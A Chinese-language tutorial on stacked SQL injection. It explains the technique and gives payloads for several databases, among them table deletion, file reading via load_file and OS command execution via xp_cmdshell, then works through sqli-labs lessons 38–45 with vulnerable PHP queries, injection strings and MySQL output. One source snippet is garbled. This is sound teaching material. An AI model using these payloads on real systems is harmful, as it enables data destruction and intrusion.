0x00 堆叠注入定义
Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。
0x01 堆叠注入原理
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
0x02 堆叠注入的局限性
堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。
此图是从原文中截取过来的,因为我个人的测试环境是php+mysql,是可以执行的,此处对于mysql/php存在质疑。但个人估计原文作者可能与我的版本的不同的原因。虽然我们前面提到了堆叠查询可以执行任意的sql语句,但是这种注入方式并不是十分的完美的。在我们的web系统中,因为代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。因此,在读取数据时,我们建议使用union(联合)注入。同时在使用堆叠注入之前,我们也是需要知道一些数据库相关信息的,例如表名,列名等信息。
0x03 各个数据库实例介绍
本节我们从常用数据库角度出发,介绍几个类型的数据库的相关用法。数据库的基本操作,增删查改。以下列出数据库相关堆叠注入的基本操作。
1.Mysql
(1)新建一表
select * from users where id=1;create table test like users;
执行成功,我们再去看一下是否新建成功表。
(2)删除上面新建的test表
select * from users where id=1;drop table test;
(3)查询数据
select * from users where id=1;select 1,2,3;
(4)加载文件
select * from users where id=1;select load_file('c:/tmpupbbn.php');
(4) 修改数据
select * from users where id=1;insert into users(id,username,password) values ('100','new','new');
2. Sql server
(1)增加数据表
select * from test;create table sc3(ss CHAR(8));
(2) 删除数据表
select * from test;drop table sc3;
(4)查询数据
select 1,2,3;select * from test;
(5)修改数据
select * from test;update test set name='test' where id=3;
(5)sqlserver中最为重要的存储过程的执行
select * from test where id=1;exec master..xp_cmdshell 'ipconfig'
3.Oracle
上面的介绍中我们已经提及,oracle不能使用堆叠注入,可以从图中看到,当有两条语句在同一行时,直接报错。无效字符。后面的就不往下继续尝试了。
4.Postgresql
(1)新建一个表
select * from user_test;create table user_data(id DATE);
可以看到user_data表已经建好。
(2)删除上面新建的user_data表
select * from user_test;delete from user_data;
(3)查询数据
select * from user_test;select 1,2,3;
(4) 修改数据
select * from user_test;update user_test set name='modify' where name='张三';
0x04 堆叠注入之sqllaps实列
1.Less-38 堆叠注入 - 字符型 - GET
(1)源代码
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
(2)测试
?id=1’;insert into users(id,username,password) values (‘38’,’less38’,’hello’)–+
mysql> select * from users; +----+----------+------------+ | id | username | password | +----+----------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2| admin2 | | 11 | admin3| admin3 | | 12 | dhakkan| dumbo | | 14 | admin4| admin4 | | 38 | less38| hello | +----+----------+------------+ 14 rows in set (0.00 sec)
发现已经添加了一个 less38 用户
?id=1’;create table less38 like users;
?id=1’;drop table less38;
2.Less-39 堆叠注入 - 整型 - GET
(1)源代码
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
(2)测试
?id=1;insert into users(id,username,password) values (‘39’,’less39’,’hello’)–-
mysql> select * from users; +----+----------+------------+ | id | username | password | +----+----------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2| admin2 | | 11 | admin3| admin3 | | 12 | dhakkan| dumbo | | 14 | admin4| admin4 | | 38 | less38| hello | | 39 | less39| hello | +----+----------+------------+ 15 rows in set (0.00 sec)
可以看到已经添加了 less39 用户了
?id=1;create table less39 like users;
?id=1;drop table less39;
3.Less-40 盲注 - 堆叠注入 - 字符型 - GET
(1)源代码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
(2)测试
?id=1’); insert into users(id,username,password) values (‘40’,’less40’,’hello’)–+
mysql> select * from users; +-----+----------+------------+ | id | username | password | +-----+----------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | dumbo | | 14 | admin4 | admin4 | | 38 | less38 | hello | | 39 | less39 | hello | | 109 | hello| hello | | 40 | less40 | hello | +-----+----------+------------+ 17 rows in set (0.00 sec)
看到添加了 less40 用户
?id=1’);create table less40 like users;
?id=1’);drop table less40;
4.Less-41 盲注 - 堆叠注入 - 整型 - GET
(1)源代码
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
(2)测试(盲注)
创建users表和增加字段值
?id=1; insert into users(id,username,password) values (‘110’,’less41’,’hello’)–+
mysql> select * from users; +-----+----------+------------+ | id | username | password | +-----+----------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | dumbo | | 14 | admin4 | admin4 | | 38 | less38 | hello | | 39 | less39 | hello | | 109 | hello| hello | | 40 | less40 | hello | | 110 | less41| hello | +-----+----------+------------+ 18 rows in set (0.00 sec)
添加了用户 less41
?id=1;create table less41 like users; //增加表
?id=1;drop table less41; //删除表
5.Less-42 报错型堆叠注入 - 字符型 - POST
(1)源代码(login.php):
$username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"]; $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
Password 变量在post 过程中,没有通过 mysql_real_escape_string() 函数的处理。因此在登录的时候密码选项我们可以进行 attack。
(2)报错测试
测试语句:
username:任意 password : c';drop table me# # 删除 me 表
或者:
username:任意 password : c';create table me like users# // 创建一个 me 表
登录之前查看表:
mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails| | referers| | uagents| | users| +--------------------+ 4 rows in set (0.00 sec)
登录前创建表
username :admin password : c';create table less42 like users#
登录后查看创建表
mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails| | less42| | referers| | uagents| | users| +--------------------+ 5 rows in set (0.00 sec)
发现添加了一个 less42 表,登录时构造的 sql 语句为:
SELECT * FROM users WHERE username=’admin’ and password=’c’;create table less42 like users–+ //利用 c’;drop table me#作为登录密码,删除该表。
登录前删除表
username: admin password : c’;drop table less42#
登录后查看删除表
mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails| | referers| | uagents| | users| +--------------------+ 4 rows in set (0.00 sec)
6.Less-43 报错型 - 堆叠注入 - 字符型 - POST
(1)源代码
$username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"]; $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
(2)测试
登录前测创建表
username : admin password: c');create table less43 like users#
登录后查看增加表
mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails| | less43| | referers| | uagents| | users| +--------------------+ 5 rows in set (0.00 sec)
登录前测试删除表
username :admin password : c');drop table less43#
登录后查看删除表
mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails| | referers| | uagents| | users| +--------------------+ 4 rows in set (0.00 sec)
6.Less-44 盲注 - 堆叠注入 - 字符型 - POST
(1)源代码
username=mysqlirealescapestring(username=mysqlirealescapestring(con1, POST[“loginuser”]);POST[“loginuser”]); password = POST[“loginpassword”];POST[“loginpassword”]; sql = "SELECT * FROM users WHERE username='username′andpassword=′username′andpassword=′password’”;
(2)测试(盲注)
登录前测试插入表和值
username : admin password : a';insert into users(id,username,password) values ('144','less44','hello')#
登录后查看增加表和值
mysql> select * from users; +-----+----------+------------+ | id | username | password | +-----+----------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | dumbo | | 14 | admin4 | admin4 | | 38 | less38 | hello | | 39 | less39 | hello | | 109 | hello| hello | | 40 | less40 | hello | | 110 | less41| hello | | 144 | less44| hello | +-----+----------+------------+ 19 rows in set (0.00 sec)
7.Less-45 报错型堆叠注入 - 字符型 - POST
(1)源代码
$username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"]; $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
(2)测试
登录前测试增加表
username : admin password : c');create table less45 like users# //创建了less45表
登录后查看增加表
mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails| | less45| | referers| | uagents| | users| +--------------------+ 5 rows in set (0.00 sec)
登录前测试删除表
username: admin password : c');drop table less45#
登录后查看删除表
mysql> show tables; +--------------------+ | Tables_in_security | +--------------------+ | emails| | referers| | uagents| | users| +--------------------+ 4 rows in set (0.00 sec)